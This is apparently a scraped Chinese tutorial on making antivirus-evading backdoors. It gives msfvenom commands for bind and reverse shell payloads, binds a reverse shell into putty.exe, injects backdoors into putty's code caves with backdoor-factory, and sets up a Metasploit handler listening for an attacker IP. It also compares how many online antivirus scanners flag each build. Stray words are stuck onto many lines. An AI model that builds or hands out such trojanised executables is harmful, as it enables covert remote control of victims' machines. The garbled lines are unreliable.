與防病毒廠商共享信息shell
VirusTotalwindows
https://www.virustotal.com/zh-cn安全
VirScantcp
https://virscan.org網站
黑產在線查殺引擎ui
https://nodistribute.com編碼
http://viruscheckmate.com掃描網站安全性3d
http://onlinelinkscan.comcode
使用msf編碼模塊生成後門blog
msfvenom -p windows/shell/bind_tcp LPORT=444 -f exe -o a.exe 21個廠商報毒
增長編碼模塊
msfvenom -a x86 -p windows/shell/bind_tcp LPORT=444 -e cmd/powershell_base64 -i 9 -f exe -o b.exe 20個廠商報毒
使用編碼後效果並不明顯,仍是不少廠商報毒
使用模板程序隱藏後門,效果比較好
msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -f exe -o c.exe
將後門綁定到putty中,這裏用的是反彈shell 注意參數lhost地址填寫的是攻擊者的IP地址,綁定後putty會報廢,若是不想破壞使用 -k 參數
msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -k -f exe -o d.exe
8個廠商報毒
+
payload: 在目標系統執行的代碼或指令,使得獲取shell
shellcode : 獲取shell的code
shell 後門程序
reverser_tcp 反彈shell
bind_tcp 正向shell
meterpreter 更高級的shell,集成了不少腳本,更容易使用
【meterpreter命令】
getuid 當前用戶信息
getsystem 提權
help 查看幫助
screenshot
由於msf知名度太大了,作出的免殺指紋早已被殺毒廠商收錄了
kali存放着windows下的執行程序目錄
/usr/share/windows-binaries/
shellter 每次生成的後門程序代碼都不一樣,動態變化的特徵,難以用指紋匹配
後門利用
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.137.128
lhost => 192.168.137.128
msf exploit(multi/handler) > set lport 444
lport => 444
msf exploit(multi/handler) >
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.137.128 yes The listen address
LPORT 444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.137.128:444
亂碼將終端編碼改爲 gbk 或者 gb2312
shllter
veil-framework
backdoor生成的後門曾經很騷,沒有一個殺軟報毒,在黑帽大會秀了一波,如今不行了,不推薦使用
backdoor-factory 利用代碼洞注入後門,不改變體積 code cave
backdoor-factory -f putty.exe -S 檢查是否支持注入後門
backdoor-factory -f putty.exe -c -l 100 檢查大於100字節的代碼洞數量
backdoor-factory -f putty.exe -s show 查看哪些payload能夠用
普通注入模式(體積會變大,直接在程序後面加代碼)
backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a
大小對比
單代碼洞注入(體積不會變,須要選擇代碼洞)
backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a
最好選擇代碼洞比較大的,不然容易致使溢出,因此這裏選擇1,這裏大小反而變小了,理論上應該不變的
使用的時候360殺軟報毒了。在線監測有23個廠商報毒,效果不怎樣,0day似的
多代碼洞注入模式
backdoor-factory -f putty_no.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -J
要選屢次代碼洞,儘可能選大的,否則要選不少次
利用:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 444
set LHOST 192.168.137.129